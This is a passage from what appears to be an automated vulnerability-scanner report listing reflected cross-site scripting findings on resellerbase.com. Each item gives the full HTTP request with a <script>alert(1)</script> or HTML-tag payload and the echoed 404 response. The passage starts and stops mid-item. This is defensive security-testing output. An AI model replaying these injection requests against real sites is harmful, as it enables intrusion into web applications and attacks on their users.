Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/rating/?9b86c<script>alert(1)</script>b7db9a85109=1 was not found on this server.</p>
...[SNIP]...

2.3864. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/4.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 64500<script>alert(1)</script>2da9e6eecc3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale64500<script>alert(1)</script>2da9e6eecc3/themes/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale64500<script>alert(1)</script>2da9e6eecc3/themes/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.3865. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/4.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4dc55<script>alert(1)</script>1f9ab1971ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes4dc55<script>alert(1)</script>1f9ab1971ea/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes4dc55<script>alert(1)</script>1f9ab1971ea/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.3866. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/4.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 569f0<script>alert(1)</script>29e07797f93 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos569f0<script>alert(1)</script>29e07797f93/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos569f0<script>alert(1)</script>29e07797f93/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.3867. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/4.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 62ecb<script>alert(1)</script>1057e36ac92 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images62ecb<script>alert(1)</script>1057e36ac92/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images62ecb<script>alert(1)</script>1057e36ac92/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.3868. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/4.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload afcf2<script>alert(1)</script>adaf3c369cb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images/ratingafcf2<script>alert(1)</script>adaf3c369cb/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/ratingafcf2<script>alert(1)</script>adaf3c369cb/4.gif was not found on this server.</p>
...[SNIP]...

2.3869. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/4.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 493a9<script>alert(1)</script>a84e716df89 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images/rating/4.gif493a9<script>alert(1)</script>a84e716df89 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:46:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/rating/4.gif493a9<script>alert(1)</script>a84e716df89 was not found on this server.</p>
...[SNIP]...

2.3870. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/4.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/rating/4.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 987e0<script>alert(1)</script>4820348d16b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images/rating/4.gif?987e0<script>alert(1)</script>4820348d16b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:45:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/rating/4.gif?987e0<script>alert(1)</script>4820348d16b=1 was not found on this server.</p>
...[SNIP]...

2.3871. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3c031<script>alert(1)</script>b76b65d01b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale3c031<script>alert(1)</script>b76b65d01b0/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale3c031<script>alert(1)</script>b76b65d01b0/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3872. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3f261<script>alert(1)</script>0722b667ffa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes3f261<script>alert(1)</script>0722b667ffa/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes3f261<script>alert(1)</script>0722b667ffa/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3873. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6f9b9<script>alert(1)</script>d2fa5f757be was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos6f9b9<script>alert(1)</script>d2fa5f757be/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos6f9b9<script>alert(1)</script>d2fa5f757be/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3874. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 185f6<script>alert(1)</script>a808ff128f5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images185f6<script>alert(1)</script>a808ff128f5/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images185f6<script>alert(1)</script>a808ff128f5/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3875. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1b800<script>alert(1)</script>a0ab7d588eb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images/rating1b800<script>alert(1)</script>a0ab7d588eb/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/rating1b800<script>alert(1)</script>a0ab7d588eb/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3876. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 6cb2c<script>alert(1)</script>92c8889fa91 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images/rating/search.php6cb2c<script>alert(1)</script>92c8889fa91?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/rating/search.php6cb2c<script>alert(1)</script>92c8889fa91?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3877. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 85cbe<a>110f8b67e05 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search85cbe<a>110f8b67e05&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search85cbe<a>110f8b67e05&opt=2 was not found on this server.</p>
...[SNIP]...

2.3878. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload fcceb<a>f22896aede4 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/themes/kosmos/images/rating/search.php?keyword=search...fcceb<a>f22896aede4&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:41:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/rating/search.php?keyword=search...fcceb<a>f22896aede4&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3879. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 24841<script>alert(1)</script>4f6b329ce20 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&24841<script>alert(1)</script>4f6b329ce20=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&24841<script>alert(1)</script>4f6b329ce20=1 was not found on this server.</p>
...[SNIP]...

2.3880. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 60a84<a>1855c2ad138 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /goods-wholesale/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=260a84<a>1855c2ad138 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /goods-wholesale/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=260a84<a>1855c2ad138 was not found on this server.</p>
...[SNIP]...

2.3881. http://www.resellerbase.com/goods-wholesale/themes/kosmos/images/review/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /goods-wholesale/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 32bfa<script>alert(1)</script>734f6067136 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /goods-wholesale32bfa<script>alert(1)</script>734f6067136/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
